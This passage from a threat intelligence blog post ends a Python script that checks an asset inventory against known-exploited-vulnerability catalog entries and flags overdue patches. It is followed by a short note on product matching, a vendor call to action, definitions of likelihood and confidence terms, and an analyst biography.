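                    "overdue": due < today,
                    "ransomware": entry.get("knownRansomwareCampaignUse", "Unknown"),
                })
    return sorted(rows, key=lambda r: (r["dueDate"], r["cveID"], r["asset"]))


if __name__ == "__main__":
    for row in match_inventory(KEV_SAMPLE, INVENTORY, REPORT_DATE):
        status = "OVERDUE" if row["overdue"] else f"{row['days_left']} days left"
        print(f"{row['asset']:14} {row['cveID']:16} due {row['dueDate']} ({status}) ransomware={row['ransomware']}")
```

The product match is intentionally loose (substring in either direction) because the catalog’s product strings bundle models, as “AE1021 and AE1021PE” does; tighten it against your own inventory naming if it produces noise.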

Let’s Secure Your Organization’s Future Together

At Deepwatch, we are committed to helping organizations like yours navigate the intricate world of cyber threats. Our cybersecurity solutions are designed to stay ahead of the curve, providing you with the proactive defenses needed to protect your organization from these threats.

Our team of cybersecurity professionals is ready to evaluate your systems, provide actionable insights, and implement robust security measures tailored to your needs.

Don’t wait for a cyber threat to disrupt your operations. Contact us today and take the first step towards a more secure future for your organization. Together, we can outsmart the threats and secure your networks.

What We Mean When We Say

Estimates of Likelihood

We use probabilistic language to reflect the Intel Team’s estimates of the likelihood of developments or events because analytical judgments are not certain. Terms like “probably,” “likely,” “very likely,” and “almost certainly” denote a higher than even chance. The terms “unlikely” and “remote” imply that an event has a lower than even chance of occurring; they do not imply that it will not. Terms like “might” reflect situations where we are unable to assess the likelihood, usually because the relevant information is lacking, sketchy, or fragmented. Terms like “we can’t dismiss,” “we can’t rule out,” and “we can’t discount” refer to an unlikely, improbable, or distant event with significant consequences.

Confidence in Assessments

Our assessments and projections are based on data that varies in scope, quality, and source. As a result, we assign our assessments high, moderate, or low levels of confidence, as follows:

High confidence indicates that our decisions are based on reliable information and/or that the nature of the problem allows us to make a sound decision. However, a “high confidence” judgment is not a fact or a guarantee, and it still carries the risk of being incorrect.

Moderate confidence denotes that the information is credible and plausible, but not of high enough quality or sufficiently corroborated to warrant a higher level of assurance.

Low confidence indicates that the information’s credibility and/or plausibility are in doubt, that the information is too fragmented or poorly corroborated to make solid analytic inferences, or that we have serious concerns or problems with the sources.

Eric Ford, Sr. Threat Intelligence Analyst

Eric is an accomplished intelligence professional with 10+ years of experience in the intelligence field supporting the Department of Defense and commercial organizations. He is responsible for collecting open-source information and analyzing it to turn it into actionable intelligence.
